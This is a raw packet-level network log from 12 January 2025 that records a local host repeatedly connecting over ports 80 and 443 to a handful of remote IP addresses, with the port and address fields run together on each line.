                                                              Jan 12, 2025 09:26:53.498959064 CET8049998188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:53.499000072 CET50006443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.499057055 CET50006443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.499075890 CET4999880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:53.499257088 CET44350006172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.499331951 CET50006443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.499511003 CET5000780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.502866030 CET8049998188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:53.504332066 CET8050007172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.504399061 CET5000780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.504475117 CET5000780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.509258986 CET8050007172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.768282890 CET8050005104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:53.768440962 CET5000580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:53.768892050 CET8050005104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:53.769011974 CET5000580192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:53.772330046 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:53.772387028 CET44350010104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:53.772470951 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:53.773499966 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:53.773525953 CET44350010104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:53.773636103 CET8050005104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:53.958750963 CET8050007172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.958864927 CET5000780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.958964109 CET8050007172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.959022045 CET5000780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:53.959548950 CET50011443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.959567070 CET44350011172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:53.959666014 CET50011443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.959686995 CET50011443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.959777117 CET44350011172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:53.959846973 CET50011443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.960197926 CET5001280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.963723898 CET8050007172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:53.965091944 CET8050012172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:53.965188026 CET5001280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.965317011 CET5001280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:53.970146894 CET8050012172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:54.235552073 CET44350010104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:54.235795021 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:54.236846924 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:54.236885071 CET44350010104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:54.236975908 CET50010443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:54.237458944 CET50017443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.237488985 CET44350017188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:54.237616062 CET50017443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.237616062 CET50017443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.237809896 CET44350017188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:54.237931013 CET50017443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.238157034 CET5001880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.243009090 CET8050018188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:54.243134022 CET5001880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.243134022 CET5001880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:54.247916937 CET8050018188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:54.421447039 CET8050012172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:54.421612024 CET5001280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:54.422247887 CET50020443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.134721041 CET44350083104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:59.134804010 CET50083443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:59.157560110 CET50086443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.157578945 CET44350086188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.157641888 CET50086443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.157677889 CET50086443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.157783985 CET44350086188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.157835007 CET50086443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.163002014 CET5008780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.167850971 CET8050087188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.167932034 CET5008780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.173010111 CET5008780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.177752972 CET8050087188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.420799017 CET8050085172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:59.421538115 CET8050085172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:59.421593904 CET5008580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:59.423465014 CET5008580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:26:59.425734043 CET50093443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.425772905 CET44350093104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.425828934 CET50093443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.426204920 CET50093443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.426311016 CET44350093104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.426367044 CET50093443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.427021027 CET5009480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.428308010 CET8050085172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:26:59.431844950 CET8050094104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.431895971 CET5009480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.431917906 CET5009480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.436716080 CET8050094104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.693499088 CET8050087188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.693607092 CET5008780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.693845034 CET8050087188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.693902969 CET5008780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:26:59.694225073 CET50095443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.694271088 CET44350095172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:59.694328070 CET50095443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.694355965 CET50095443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.694592953 CET44350095172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:59.694653034 CET50095443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.694789886 CET5009680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.698455095 CET8050087188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:26:59.699588060 CET8050096172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:59.699649096 CET5009680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.699696064 CET5009680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:26:59.704526901 CET8050096172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:26:59.960928917 CET8050094104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.961010933 CET5009480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.962433100 CET8050094104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:26:59.962475061 CET5009480192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:26:59.963551998 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:59.963593960 CET44350099104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:59.963666916 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:59.964731932 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:26:59.964745045 CET44350099104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:26:59.965871096 CET8050094104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:00.189785004 CET8050096172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.189861059 CET5009680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.190351963 CET50105443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.190387964 CET44350105172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.190491915 CET50105443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.190548897 CET50105443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.190603971 CET44350105172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.190656900 CET50105443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.190937042 CET5010680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.191065073 CET8050096172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.191140890 CET5009680192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.194638968 CET8050096172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.195785999 CET8050106172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.195849895 CET5010680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.195873022 CET5010680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.200664043 CET8050106172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.425002098 CET44350099104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:00.425091982 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:00.426376104 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:00.426548004 CET44350099104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:00.426615953 CET50099443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:00.427061081 CET50107443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.427089930 CET44350107188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.427143097 CET50107443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.427165031 CET50107443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.427258968 CET44350107188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.427494049 CET50107443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.427639008 CET5010880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.432523966 CET8050108188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.432606936 CET5010880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.432697058 CET5010880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.437438011 CET8050108188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.669436932 CET8050106172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.669574022 CET5010680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.669827938 CET8050106172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.669876099 CET5010680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:00.670264006 CET50109443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.670367002 CET44350109104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:00.670703888 CET50109443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.670778036 CET50109443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.671058893 CET5011080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.671101093 CET44350109104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:00.671175957 CET50109443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.674474001 CET8050106172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:00.675909996 CET8050110104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:00.675968885 CET5011080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.675987005 CET5011080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:00.680838108 CET8050110104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:00.891446114 CET8050108188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.891705036 CET5010880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.892040968 CET50114443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.892066956 CET44350114172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.892129898 CET50114443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.892163038 CET8050108188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.892180920 CET50114443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.892219067 CET5010880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:00.892430067 CET44350114172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.892513037 CET50114443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.892524958 CET5011580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.896536112 CET8050108188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:00.897335052 CET8050115172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:00.897417068 CET5011580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.897468090 CET5011580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:00.902261019 CET8050115172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:01.126154900 CET8050110104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.126254082 CET5011080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.126553059 CET8050110104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.126611948 CET5011080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.128705025 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.128731012 CET44350120104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:01.128803015 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.129270077 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.129283905 CET44350120104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:01.131053925 CET8050110104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.370486975 CET8050115172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:01.370656013 CET5011580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:01.370825052 CET8050115172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:01.370924950 CET5011580192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:01.371531010 CET50121443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.371557951 CET44350121172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.371691942 CET50121443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.371691942 CET50121443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.371824026 CET44350121172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.371951103 CET50121443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.372164965 CET5012280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.375488997 CET8050115172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:01.377006054 CET8050122172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.377096891 CET5012280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.377096891 CET5012280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.381967068 CET8050122172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.585762978 CET44350120104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:01.585846901 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.587153912 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.587201118 CET44350120104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:01.587260008 CET50120443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:01.587775946 CET50123443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.587822914 CET44350123188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:01.587984085 CET50123443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.587984085 CET50123443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.588093042 CET44350123188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:01.588154078 CET50123443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.588366032 CET5012480192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.593910933 CET8050124188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:01.593971968 CET5012480192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.594049931 CET5012480192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:01.600991964 CET8050124188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:01.833303928 CET8050122172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.833391905 CET5012280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.833899021 CET8050122172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.833956003 CET5012280192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:01.833981037 CET50130443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.834028006 CET44350130104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.834098101 CET50130443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.834135056 CET50130443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.834291935 CET44350130104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.834418058 CET5013180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.834440947 CET50130443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.838157892 CET8050122172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:01.839238882 CET8050131104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:01.839301109 CET5013180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.839325905 CET5013180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:01.844160080 CET8050131104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:02.078713894 CET8050124188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:02.078881025 CET5012480192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:02.079178095 CET8050124188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:02.079246998 CET5012480192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:02.079580069 CET50132443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.079642057 CET44350132172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.079715014 CET50132443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.079749107 CET50132443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.079914093 CET44350132172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.080332041 CET5013380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.080346107 CET50132443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.083744049 CET8050124188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:02.085158110 CET8050133172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.085354090 CET5013380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.085355043 CET5013380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.090200901 CET8050133172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.288213968 CET8050131104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:02.288384914 CET5013180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:02.288975954 CET8050131104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:02.289031029 CET5013180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:02.290544987 CET50136443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:02.290565014 CET44350136104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:02.290666103 CET50136443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:02.291137934 CET50136443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:02.291151047 CET44350136104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:02.293226957 CET8050131104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:02.536221027 CET8050133172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.536339998 CET5013380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.536833048 CET8050133172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.536900043 CET5013380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:02.537126064 CET50142443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:02.537147045 CET44350142172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:02.538077116 CET50142443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:02.538120985 CET50142443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:02.538177013 CET44350142172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:02.538558960 CET5014380192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:02.538578987 CET50142443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:02.541273117 CET8050133172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:02.543421030 CET8050143172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.062371969 CET50212443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:07.062791109 CET50212443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:07.062803984 CET44350212104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:07.064773083 CET8050205104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:07.276124001 CET8050207172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:07.276597977 CET5020780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:07.277147055 CET50213443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.277173042 CET44350213172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.277221918 CET8050207172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:07.277287006 CET5020780192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:07.277288914 CET50213443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.277312040 CET50213443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.277467012 CET44350213172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.277525902 CET50213443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.277713060 CET5021480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.281462908 CET8050207172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:07.282663107 CET8050214172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.282737970 CET5021480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.282783985 CET5021480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.287550926 CET8050214172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.534415007 CET44350212104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:07.534488916 CET50212443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:07.535588026 CET50212443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:07.535665989 CET44350212104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:07.535732031 CET50212443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:07.536356926 CET50215443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.536462069 CET44350215188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:07.536602020 CET50215443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.536678076 CET50215443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.536737919 CET44350215188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:07.536819935 CET50215443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.537137985 CET5021680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.542023897 CET8050216188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:07.542223930 CET5021680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.542223930 CET5021680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:07.547060013 CET8050216188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:07.757966995 CET8050214172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.758074045 CET5021480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.758302927 CET8050214172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.758667946 CET50217443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.758742094 CET44350217104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:07.758773088 CET5021480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:07.758816004 CET50217443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.758878946 CET50217443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.758922100 CET44350217104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:07.759113073 CET5021880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.759141922 CET50217443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.762948990 CET8050214172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:07.763962030 CET8050218104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:07.764019012 CET5021880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.764039040 CET5021880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:07.768774986 CET8050218104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:08.004745960 CET8050216188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:08.004909039 CET5021680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:08.005013943 CET8050216188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:08.005079985 CET5021680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:08.005505085 CET50219443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.005556107 CET44350219172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:08.005626917 CET50219443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.005671978 CET50219443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.005795002 CET44350219172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:08.005848885 CET50219443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.005994081 CET5022080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.009829998 CET8050216188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:08.010744095 CET8050220172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:08.010818005 CET5022080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:08.010873079 CET5022080192.168.2.7172.67.198.113
